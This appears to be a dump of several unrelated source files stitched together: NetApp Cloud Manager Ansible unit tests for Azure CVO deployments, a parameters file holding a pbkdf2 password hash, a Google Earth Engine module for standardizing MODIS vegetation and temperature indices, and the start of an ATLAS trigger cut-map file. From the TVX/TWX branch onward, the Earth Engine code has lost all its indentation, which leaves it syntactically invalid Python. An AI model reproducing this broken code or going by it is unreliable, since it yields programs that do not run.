            exit_json(changed=True, msg="TestCase Fail when required args are present")
        assert exc.value.args[0]['changed']
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.wait_on_completion')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_tenant')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_nss')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.post')
    def test_create_cloudmanager_cvo_azure_pass(self, get_post_api, get_working_environment_details_by_name, get_nss,
                                                get_tenant, wait_on_completion, get_token):
        set_module_args(self.set_args_create_cloudmanager_cvo_azure())
        get_token.return_value = 'test', 'test'
        my_obj = my_module()

        response = {'publicId': 'abcdefg12345'}
        get_post_api.return_value = response, None, None
        get_working_environment_details_by_name.return_value = None, None
        get_nss.return_value = 'nss-test', None
        get_tenant.return_value = 'test', None
        wait_on_completion.return_value = None

        with pytest.raises(AnsibleExitJson) as exc:
            my_obj.apply()
        print('Info: test_create_cloudmanager_cvo_azure_pass: %s' % repr(exc.value))
        assert exc.value.args[0]['changed']
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.wait_on_completion')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_tenant')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_nss')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.post')
    def test_create_cloudmanager_cvo_azure_capacity_license_pass(self, get_post_api,
                                                                 get_working_environment_details_by_name, get_nss,
                                                                 get_tenant, wait_on_completion, get_token):
        data = self.set_args_create_cloudmanager_cvo_azure()
        data['license_type'] = 'capacity-paygo'
        data['capacity_package_name'] = 'Essential'
        set_module_args(data)
        get_token.return_value = 'test', 'test'
        my_obj = my_module()

        response = {'publicId': 'abcdefg12345'}
        get_post_api.return_value = response, None, None
        get_working_environment_details_by_name.return_value = None, None
        get_nss.return_value = 'nss-test', None
        get_tenant.return_value = 'test', None
        wait_on_completion.return_value = None

        with pytest.raises(AnsibleExitJson) as exc:
            my_obj.apply()
        print('Info: test_create_cloudmanager_cvo_azure_capacity_license_pass: %s' % repr(exc.value))
        assert exc.value.args[0]['changed']
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.wait_on_completion')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_tenant')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_nss')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.post')
    def test_create_cloudmanager_cvo_azure_ha_capacity_license_pass(self, get_post_api,
                                                                    get_working_environment_details_by_name, get_nss,
                                                                    get_tenant, wait_on_completion, get_token):
        data = self.set_args_create_cloudmanager_cvo_azure()
        data['is_ha'] = True
        data['license_type'] = 'ha-capacity-paygo'
        data['capacity_package_name'] = 'Professional'
        set_module_args(data)
        get_token.return_value = 'test', 'test'
        my_obj = my_module()

        response = {'publicId': 'abcdefg12345'}
        get_post_api.return_value = response, None, None
        get_working_environment_details_by_name.return_value = None, None
        get_nss.return_value = 'nss-test', None
        get_tenant.return_value = 'test', None
        wait_on_completion.return_value = None

        with pytest.raises(AnsibleExitJson) as exc:
            my_obj.apply()
        print('Info: test_create_cloudmanager_cvo_azure_ha_capacity_license_pass: %s' % repr(exc.value))
        assert exc.value.args[0]['changed']
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.wait_on_completion')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_tenant')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_nss')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.post')
    def test_create_cloudmanager_cvo_azure_nodebase_license_pass(self, get_post_api,
                                                                 get_working_environment_details_by_name, get_nss,
                                                                 get_tenant, wait_on_completion, get_token):
        data = self.set_args_create_cloudmanager_cvo_azure()
        data['license_type'] = 'azure-cot-premium-byol'
        data['serial_number'] = '12345678'
        set_module_args(data)
        get_token.return_value = 'test', 'test'
        my_obj = my_module()

        response = {'publicId': 'abcdefg12345'}
        get_post_api.return_value = response, None, None
        get_working_environment_details_by_name.return_value = None, None
        get_nss.return_value = 'nss-test', None
        get_tenant.return_value = 'test', None
        wait_on_completion.return_value = None

        with pytest.raises(AnsibleExitJson) as exc:
            my_obj.apply()
        print('Info: test_create_cloudmanager_cvo_azure_nodebase_license_pass: %s' % repr(exc.value))
        assert exc.value.args[0]['changed']
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.wait_on_completion')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_tenant')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_nss')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.post')
    def test_create_cloudmanager_cvo_azure_ha_nodebase_license_pass(self, get_post_api,
                                                                    get_working_environment_details_by_name, get_nss,
                                                                    get_tenant, wait_on_completion, get_token):
        data = self.set_args_create_cloudmanager_cvo_azure()
        data['is_ha'] = True
        data['license_type'] = 'azure-ha-cot-premium-byol'
        data['platform_serial_number_node1'] = '12345678'
        data['platform_serial_number_node2'] = '23456789'
        set_module_args(data)
        get_token.return_value = 'test', 'test'
        my_obj = my_module()

        response = {'publicId': 'abcdefg12345'}
        get_post_api.return_value = response, None, None
        get_working_environment_details_by_name.return_value = None, None
        get_nss.return_value = 'nss-test', None
        get_tenant.return_value = 'test', None
        wait_on_completion.return_value = None

        with pytest.raises(AnsibleExitJson) as exc:
            my_obj.apply()
        print('Info: test_create_cloudmanager_cvo_azure_pass: %s' % repr(exc.value))
        assert exc.value.args[0]['changed']
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.wait_on_completion')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_tenant')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_nss')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.post')
    def test_create_cloudmanager_cvo_azure_ha_pass(self, get_post_api, get_working_environment_details_by_name, get_nss,
                                                   get_tenant, wait_on_completion, get_token):
        data = self.set_args_create_cloudmanager_cvo_azure()
        data['is_ha'] = True
        set_module_args(data)
        get_token.return_value = 'test', 'test'
        my_obj = my_module()

        response = {'publicId': 'abcdefg12345'}
        get_post_api.return_value = response, None, None
        get_working_environment_details_by_name.return_value = None, None
        get_nss.return_value = 'nss-test', None
        get_tenant.return_value = 'test', None
        wait_on_completion.return_value = None

        with pytest.raises(AnsibleExitJson) as exc:
            my_obj.apply()
        print('Info: test_create_cloudmanager_cvo_azure_ha_pass: %s' % repr(exc.value))
        assert exc.value.args[0]['changed']
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.wait_on_completion')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.delete')
    def test_delete_cloudmanager_cvo_azure_pass(self, get_delete_api, get_working_environment_details_by_name,
                                                wait_on_completion, get_token):
        set_module_args(self.set_args_delete_cloudmanager_cvo_azure())
        get_token.return_value = 'test', 'test'
        my_obj = my_module()

        my_cvo = {
            'name': 'Dummyname',
            'publicId': 'test'}
        get_working_environment_details_by_name.return_value = my_cvo, None
        get_delete_api.return_value = None, None, None
        wait_on_completion.return_value = None

        with pytest.raises(AnsibleExitJson) as exc:
            my_obj.apply()
        print('Info: test_delete_cloudmanager_cvo_azure_pass: %s' % repr(exc.value))
        assert exc.value.args[0]['changed']
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp.CloudManagerRestAPI.get_token')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.update_tier_level')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.update_cvo_tags')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.update_svm_password')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_property')
    @patch('ansible_collections.netapp.cloudmanager.plugins.module_utils.netapp_module.NetAppModule.get_working_environment_details_by_name')
    def test_change_cloudmanager_cvo_azure(self, get_cvo, get_property, get_details, update_svm_password, update_cvo_tags,
                                           update_tier_level, get_token):
        set_module_args(self.set_default_args_pass_check())
        modify = ['svm_password', 'azure_tag', 'tier_level']

        my_cvo = {
            'name': 'TestA',
            'publicId': 'test',
            'svm_password': 'password',
            'isHA': False,
            'azure_tag': [{'tag_key': 'keya', 'tag_value': 'valuea'}, {'tag_key': 'keyb', 'tag_value': 'valueb'}],
        }
        get_cvo.return_value = my_cvo, None

        cvo_property = {'name': 'TestA',
                        'publicId': 'test',
                        'ontapClusterProperties': {
                            'capacityTierInfo': {'tierLevel': 'normal'},
                            'licensePackageName': 'Professional',
                            'licenseType': {'capacityLimit': {'size': 2000.0, 'unit': 'TB'},
                                            'name': 'Cloud Volumes ONTAP Capacity Based Charging'},
                            'ontapVersion': '9.10.0.T1.azure',
                            'writingSpeedState': 'NORMAL'},
                        'providerProperties': {
                            'cloudProviderAccountId': 'CloudProviderAccount-abcdwxyz',
                            'regionName': 'westus',
                            'instanceType': 'Standard_DS4_v2',
                            'resourceGroup': {
                                'name': 'TestA-rg',
                                'location': 'westus',
                                'tags': {
                                    'DeployedByOccm': 'true'
                                }
                            },
                            'vnetCidr': '10.0.0.0/24',
                            'tags': {
                                'DeployedByOccm': 'true'
                            }},
                        'tenantId': 'Tenant-abCdEfg1',
                        'workingEnvironmentTyp': 'VSA'
                        }
        get_property.return_value = cvo_property, None

        cvo_details = {'cloudProviderName': 'Azure',
                       'isHA': False,
                       'name': 'TestA',
                       'ontapClusterProperties': None,
                       'publicId': 'test',
                       'status': None,
                       'userTags': {'DeployedByOccm': 'true', 'key1': 'value1'},
                       'workingEnvironmentType': 'VSA'}
        get_details.return_value = cvo_details, None

        get_token.return_value = 'test', 'test'
        my_obj = my_module()

        for item in modify:
            if item == 'svm_password':
                update_svm_password.return_value = True, None
            elif item == 'azure_tag':
                update_cvo_tags.return_value = True, None
            elif item == 'tier_level':
                update_tier_level.return_value = True, None

        with pytest.raises(AnsibleExitJson) as exc:
            my_obj.apply()
        print('Info: test_change_cloudmanager_cvo_azure: %s' % repr(exc.value))
        assert exc.value.args[0]['changed']
# === parameters_443.py — repo: gus-tech/warden (BSD-3-Clause) ===
password="pbkdf2(1000,20,sha512)$9da7bc4479e9347e$647a07974df229cc01ebce39ab3a3fcbe05f70aa"
# === modis/utils/calculations.py — repo: SalsaBoy990/modis-standardize (MIT) ===
# Import modules
import ee
from modis.utils.quality_mask import qualityMask, addMask, addMaskedData
from modis.utils.indices import addNDVI, addNDWI, addNDDI
from modis.data.products import Products
# Initializations, instantiations
ee.Initialize()
products = Products()
def calculateMeanStdev(product, bandName, doy, step, start, finish, point, studyArea, resolution, isItNightBoolean):
    # for filtering the appropriate image using doy range
    doyFilter = ee.Filter.dayOfYear(doy, doy + step)
    isItNight = (isItNightBoolean or False)

    if product == products.modisRefl:
        # filter collection
        # add quality mask to collection and update mask after
        # add spectral indices to collection
        filteredCollection = ee.ImageCollection(product) \
            .filterBounds(point) \
            .filterDate(start, finish) \
            .filter(doyFilter) \
            .map(addMask(product, resolution, product, isItNight)) \
            .map(addMaskedData(product)) \
            .map(addNDVI(product)) \
            .map(addNDWI(product)) \
            .map(addNDDI(product))
        # print(filteredCollection.getInfo())

        mean = filteredCollection.select(bandName).mean().clip(studyArea)
        stdev = filteredCollection.select(bandName).reduce(ee.Reducer.stdDev()).clip(studyArea)

        # !!! This is a critical part!!
        saveRes = dict()
        saveRes['meanMap'] = mean
        saveRes['stdevMap'] = stdev
        # print(saveRes.get('meanMap').getInfo())
        return saveRes
    elif product == products.modisEvi:
        storedBandName = str(bandName) + '_1'
        # EVI data are 16-day composites, so we need to change the doy filter here
        step = 15
        doyFilter_16day = ee.Filter.dayOfYear(doy, doy + step)

        # filter collection
        # add quality mask to collection and update mask after
        # add spectral indices to collection
        filteredCollection = ee.ImageCollection(product) \
            .filterBounds(point) \
            .filterDate(start, finish) \
            .filter(doyFilter_16day) \
            .map(addMask(product, resolution, product, isItNight)) \
            .map(addMaskedData(product))
        # print(ee.Image(filteredCollection.first()).getInfo())

        mean = filteredCollection.select(storedBandName).mean().clip(studyArea)
        stdev = filteredCollection.select(storedBandName).reduce(ee.Reducer.stdDev()).clip(studyArea)

        # !!! This is a critical part!!
        saveRes = dict()
        saveRes['meanMap'] = mean
        saveRes['stdevMap'] = stdev
        # print(saveRes.get('meanMap').getInfo())
        return saveRes
    elif product == products.modisTemp:
        storedBandName = str(bandName) + '_1'

        # Add Celsius LST band to ImageCollection
        def addCelsiusBand(bandName):
            # Convert data to Celsius, add new band
            return lambda image: image.addBands(image.select(bandName)
                                                .multiply(ee.Image.constant(0.02))
                                                .subtract(ee.Image.constant(273.15))
                                                .rename('LSTCelsius'))

        # filter collection
        # add quality mask to collection and update mask after
        filteredCollection = ee.ImageCollection(product) \
            .filterBounds(point) \
            .filterDate(start, finish) \
            .filter(doyFilter) \
            .map(addMask(product, resolution, product, isItNight)) \
            .map(addMaskedData(product)) \
            .map(addCelsiusBand(storedBandName))
        # print(filteredCollection.getInfo())

        mean = filteredCollection.select('LSTCelsius').mean().clip(studyArea)
        stdev = filteredCollection.select('LSTCelsius').reduce(ee.Reducer.stdDev()).clip(studyArea)

        saveRes = dict()
        saveRes['meanMap'] = mean
        saveRes['stdevMap'] = stdev
        # print(saveRes.get('meanMap').getInfo())
        return saveRes
    elif product == products.modisFpar:
        storedBandName = str(bandName) + '_1'

        # Apply scale to fAPAR data
        def scaleFapar(bandName):
            # fAPAR data scale factor = 0.01
            return lambda image: image.addBands(image.select(bandName)
                                                .multiply(ee.Image.constant(0.01))
                                                .rename('faparPercent'))

        # filter collection
        # add quality mask to collection and update mask after
        filteredCollection = ee.ImageCollection(product) \
            .filterBounds(point) \
            .filterDate(start, finish) \
            .filter(doyFilter) \
            .map(addMask(product, resolution, product, isItNight)) \
            .map(addMaskedData(product)) \
            .map(scaleFapar(storedBandName))
        # print(filteredCollection.getInfo())

        mean = filteredCollection.select('faparPercent').mean().clip(studyArea)
        stdev = filteredCollection.select('faparPercent').reduce(ee.Reducer.stdDev()).clip(studyArea)

        saveRes = dict()
        saveRes['meanMap'] = mean
        saveRes['stdevMap'] = stdev
        # print(saveRes.get('meanMap').getInfo())
        return saveRes
    elif product == products.modisEt:
        storedBandName = bandName
        if bandName == 'ETPET':
            bandName = 'ET'

        # Add ET/PET ratio band to ImageCollection
        def addEtPetRatioBand(image):
            return image.addBands(image.select('ET_1')
                                  .divide(image.select('PET_1'))
                                  .rename('etPetRatio'))

        # Apply scale to Evapotranspiration data
        def scaleET(image):
            # ET data scale factor = 0.1
            return image.addBands(image.select('ET_1')
                                  .multiply(ee.Image.constant(0.1))
                                  .rename('ET_final'))

        # filter collection
        # add quality mask to collection and update mask after
        filteredCollection = ee.ImageCollection(product) \
            .filterBounds(point) \
            .filterDate(start, finish) \
            .filter(doyFilter) \
            .map(addMask(product, resolution, product, isItNight)) \
            .map(addMaskedData(product)) \
            .map(scaleET) \
            .map(addEtPetRatioBand)
        # print(filteredCollection.getInfo())

        if storedBandName == 'ET':
            mean = filteredCollection.select('ET_final').mean().clip(studyArea)
            stdev = filteredCollection.select('ET_final').reduce(ee.Reducer.stdDev()).clip(studyArea)
        elif storedBandName == 'ETPET':
            mean = filteredCollection.select('etPetRatio').mean().clip(studyArea)
            stdev = filteredCollection.select('etPetRatio').reduce(ee.Reducer.stdDev()).clip(studyArea)

        saveRes = dict()
        saveRes['meanMap'] = mean
        saveRes['stdevMap'] = stdev
        # print(saveRes.get('meanMap').getInfo())
        return saveRes
elif bandName == 'TVX' or bandName == 'TWX':
# Use appropriate index
index = 'NDVI'
if bandName == 'TVX':
index = 'NDVI'
elif bandName == 'TWX':
index = 'NDWI'
print('Selected index: ' + index)
# Add Celsius LST band to ImageCollection
def addCelsiusBand(_product):  # argument unused by the returned mapper
return lambda image: image.addBands(image.select('LST_Day_1km_1')
.multiply(ee.Image.constant(0.02))
.subtract(ee.Image.constant(273.15))
.rename('LSTCelsius'))
product = 'MODIS/006/MOD11A2'
# filter collection
filteredCollectionLST = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(addCelsiusBand(product))
# print(filteredCollectionLST.getInfo())
product = 'MODIS/006/MOD09A1'
# filter collection
filteredCollectionNDI = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(addNDVI(product)) \
.map(addNDWI(product))
# print(filteredCollectionNDI.getInfo())
# Define an inner join
innerJoin = ee.Join.inner()
# Specify an equals filter for image timestamps
# Join NDVI and LST collection images by the start_time field
filterTimeEq = ee.Filter.equals(leftField = 'system:time_start', rightField = 'system:time_start')
# Apply the join
innerJoinedData = innerJoin.apply(filteredCollectionLST, filteredCollectionNDI, filterTimeEq)
# print(innerJoinedData)
# Concatenate images to create an ImageCollection
innerJoinedData = innerJoinedData.map(lambda feature: ee.Image.cat(feature.get('primary'), feature.get('secondary')))
# We need an explicit cast to ImageCollection so that GEE can understand the type to work with
innerJoinedData = ee.ImageCollection(innerJoinedData)
saveBandName = 'LST_' + str(index) + '_ratio'
# Add LST/NDVI ratio band to ImageCollection
def addLstNdiRatioBand(_product, index, saveName):  # first argument unused by the returned mapper
return lambda image: image.addBands(image.select('LSTCelsius')
.divide(image.select(index))
.rename(saveName))
product = 'MODIS/006/MOD11A2'
innerJoinedData = innerJoinedData.map(addLstNdiRatioBand(product, index, saveBandName))
mean = innerJoinedData.select(saveBandName).mean().clip(studyArea)
stdev = innerJoinedData.select(saveBandName).reduce(ee.Reducer.stdDev()).clip(studyArea)
saveRes = dict()
saveRes['meanMap'] = mean
saveRes['stdevMap'] = stdev
# print(saveRes.get('meanMap').getInfo())
return saveRes
else:
print('Error in "calculateMeanStdev": unsupported product/band combination')
return -1
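The TVX/TWX branch above joins the LST and NDVI/NDWI collections on their `system:time_start` timestamps and concatenates the matching images. A plain-Python sketch of what `ee.Join.inner()` followed by `ee.Image.cat` accomplishes here — dicts stand in for `ee.Image` objects, and all values are illustrative:

```python
def inner_join_by_time(primary, secondary):
    """Pure-Python analogue of ee.Join.inner() keyed on 'system:time_start':
    keep only timestamps present in both collections, merging their bands."""
    sec = {img['system:time_start']: img for img in secondary}
    joined = []
    for img in primary:
        t = img['system:time_start']
        if t in sec:
            merged = dict(img)          # like ee.Image.cat(primary, secondary)
            merged.update(sec[t])
            joined.append(merged)
    return joined

lst = [{'system:time_start': 1, 'LSTCelsius': 21.0},
       {'system:time_start': 2, 'LSTCelsius': 24.0}]
ndvi = [{'system:time_start': 2, 'NDVI': 0.6}]
out = inner_join_by_time(lst, ndvi)  # only the t=2 pair survives the join
```

Only after this merge does the LST/index ratio band become computable per image, which is why the explicit `ee.ImageCollection` cast precedes the ratio `map` in the code above.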
def standardizeVariables(product, bandName, year, doy, step, point, mean, stdev, resolution, isItNight):
start = ee.Date(str(year) + '-01-01')
finish = ee.Date(str(year) + '-12-31')
# print(start.getInfo(), finish.getInfo())
isItNight = (isItNight or False)
# for filtering the appropriate image using doy range
doyFilter = ee.Filter.dayOfYear(doy, doy + step)
if product == products.modisRefl:
# filter collection
# add quality mask to collection and update mask after
# add spectral indices to collection
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(addNDVI(product)) \
.map(addNDWI(product)) \
.map(addNDDI(product))
# print(filteredCollection.getInfo())
current = filteredCollection.first()
# standardize dataset
anomaly = current.select(bandName).subtract(mean)
standardizedResult = anomaly.divide(stdev).focal_mean()
return standardizedResult
elif product == products.modisEvi:
storedBandName = str(bandName) + '_1'
# EVI data are 16-day composites, so we need to change the doy filter here
step = 15
doyFilter_16day = ee.Filter.dayOfYear(doy, doy + step)
# filter collection
# add quality mask to collection and update mask after
# add spectral indices to collection
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter_16day) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product))
# print(filteredCollection.getInfo())
current = filteredCollection.first()
# standardize dataset
anomaly = current.select(storedBandName).subtract(mean)
standardizedResult = anomaly.divide(stdev).focal_mean()
return standardizedResult
elif product == products.modisTemp:
storedBandName = str(bandName) + '_1'
# Add Celsius LST band to ImageCollection
def addCelsiusBand(_product, bandName):  # first argument unused by the returned mapper
return lambda image: image.addBands(image.select(bandName) \
.multiply(ee.Image.constant(0.02)) \
.subtract(ee.Image.constant(273.15)) \
.rename('LSTCelsius'))
# filter collection
# add quality mask to collection and update mask after
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(addCelsiusBand(product, storedBandName))
# print(filteredCollection.getInfo())
current = filteredCollection.first()
# standardize dataset
anomaly = current.select('LSTCelsius').subtract(mean)
standardizedResult = anomaly.divide(stdev).focal_mean()
return standardizedResult
elif product == products.modisFpar:
storedBandName = str(bandName) + '_1'
# Apply scale to fAPAR data
def scaleFapar(_product, bandName):  # first argument unused by the returned mapper
# fAPAR data scale factor = 0.01
return lambda image: image.addBands(image.select(bandName) \
.multiply(ee.Image.constant(0.01)) \
.rename('faparPercent'))
# filter collection
# add quality mask to collection and update mask after
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(scaleFapar(product, storedBandName))
# print(filteredCollection.getInfo())
current = filteredCollection.first()
# standardize dataset
anomaly = current.select('faparPercent').subtract(mean)
standardizedResult = anomaly.divide(stdev).focal_mean()
return standardizedResult
elif product == products.modisEt:
storedBandName = bandName
if bandName == 'ETPET':
bandName = 'ET'
# Add ET/PET ratio band to ImageCollection
def addEtPetRatioBand(_product):  # argument unused by the returned mapper
return lambda image: image.addBands(image.select('ET_1')
.divide(image.select('PET_1'))
.rename('etPetRatio'))
# Apply scale to Evapotranspiration data
# ET data scale factor = 0.1
def scaleET(_product):  # argument unused by the returned mapper
return lambda image: image.addBands(image.select('ET_1') \
.multiply(ee.Image.constant(0.1)) \
.rename('ET_final'))
# filter collection
# add quality mask to collection and update mask after
filteredCollection = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(scaleET(product)) \
.map(addEtPetRatioBand(product))
# print(filteredCollection.getInfo())
current = filteredCollection.first()
# print(current.getInfo())
if storedBandName == 'ET':
# standardize dataset
anomaly = current.select('ET_final').subtract(mean)
standardizedResult = anomaly.divide(stdev).focal_mean()
elif storedBandName == 'ETPET':
# standardize dataset
anomaly = current.select('etPetRatio').subtract(mean)
standardizedResult = anomaly.divide(stdev).focal_mean()
# print(standardizedResult.getInfo())
return standardizedResult
elif bandName == 'TVX' or bandName == 'TWX':
# Use appropriate index
index = 'NDVI'
if bandName == 'TVX':
index = 'NDVI'
elif bandName == 'TWX':
index = 'NDWI'
# Add Celsius LST band to ImageCollection
def addCelsiusBand(_product):  # argument unused by the returned mapper
return lambda image: image.addBands(image.select('LST_Day_1km_1')
.multiply(ee.Image.constant(0.02))
.subtract(ee.Image.constant(273.15))
.rename('LSTCelsius'))
product = 'MODIS/006/MOD11A2'
# filter collection
filteredCollectionLST = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(addCelsiusBand(product))
# print(filteredCollectionLST.getInfo())
product = 'MODIS/006/MOD09A1'
# filter collection
filteredCollectionNDI = ee.ImageCollection(product) \
.filterBounds(point) \
.filterDate(start, finish) \
.filter(doyFilter) \
.map(addMask(product, resolution, product, isItNight)) \
.map(addMaskedData(product)) \
.map(addNDVI(product)) \
.map(addNDWI(product))
# print(filteredCollectionNDI.getInfo())
# Define an inner join
innerJoin = ee.Join.inner()
# Specify an equals filter for image timestamps
# Join NDVI and LST collection images by the start_time field
filterTimeEq = ee.Filter.equals(leftField = 'system:time_start', rightField = 'system:time_start')
# Apply the join
innerJoinedData = innerJoin.apply(filteredCollectionLST, filteredCollectionNDI, filterTimeEq)
# print(innerJoinedData)
# Concatenate images to create an ImageCollection
innerJoinedData = innerJoinedData.map(lambda feature: ee.Image.cat(feature.get('primary'), feature.get('secondary')))
# We need an explicit cast to ImageCollection so that GEE can understand the type to work with
innerJoinedData = ee.ImageCollection(innerJoinedData)
# print(innerJoinedData.getInfo())
saveBandName = 'LST_' + str(index) + '_ratio'
# Add LST/NDVI ratio band to ImageCollection
def addLstNdiRatioBand(_product, index, saveName):  # first argument unused by the returned mapper
return lambda image: image.addBands(image.select('LSTCelsius')
.divide(image.select(index))
.rename(saveName))
product = 'MODIS/006/MOD11A2'
innerJoinedData = innerJoinedData.map(addLstNdiRatioBand(product, index, saveBandName))
current = innerJoinedData.first()
# standardize dataset
anomaly = current.select(saveBandName).subtract(mean)
standardizedResult = anomaly.divide(stdev).focal_mean()
return standardizedResult
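Every branch of `standardizeVariables` ends with the same per-pixel operation: subtract the long-term mean and divide by the standard deviation (the trailing `focal_mean()` neighborhood smoothing is omitted here). A minimal sketch of that z-score step on plain numbers — illustrative values, not EE images:

```python
def standardize(values, mean, stdev):
    """Per-pixel z-score: (x - mean) / stdev, mirroring
    current.select(band).subtract(mean).divide(stdev) above."""
    return [(x - m) / s for x, m, s in zip(values, mean, stdev)]

# three toy "pixels" with their per-pixel climatological mean and stdev
z = standardize([25.0, 30.0, 20.0], [24.0, 24.0, 24.0], [2.0, 4.0, 2.0])
```

The `mean` and `stdev` inputs are exactly the `meanMap`/`stdevMap` images produced by `calculateMeanStdev`, so a positive z-value means the current composite is above its long-term average for that pixel.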
# File: kepler/emulator/hypos/TrigEgammaFastCaloHypoCuts.py (repo: micaelverissimo/kepler, license: MIT)
__all__ = ['L2CaloCutMaps', 'L2CaloPhotonCutMaps']
# Copyright (C) 2002-2017 CERN for the benefit of the ATLAS collaboration
# L2 Calo cut definitions for Electrons
# Ryan Mackenzie White <ryan.white@cern.ch>
# Akshay Katre
# Cuts migrated from L2CaloHypoConfig
class L2CaloCutMaps(object):
# The following triggers were optimized in 2012 by YanPing
# e12_loose1
# e12_loose0
# loose triggers above 22 GeV use e12_loose1 cut defs
# e24_medium1 -- Higher threshold triggers use same cuts
# tight/tight1 uses e24_medium1 cuts
# New EF ID tunes will start with Run1 loose1,medium1,tight1 cuts
# Cut maps are grouped by Et threshold
# Adding vloose working points, same cuts as loose
def __init__(self, threshold):
##########################
# Et 5 GeV
##########################
# e5_loose1
##########################
# self.HADETthr = [0.1738, 0.1696, 0.1318, 0.1738, 0.0548875, 0.1486, 0.1696, 0.1738, 0.157]
# self.CAERATIOthr = [0.57, 0.532, 0.342, 0.228, -9999., 0.304, 0.608, 0.722, -9999.]
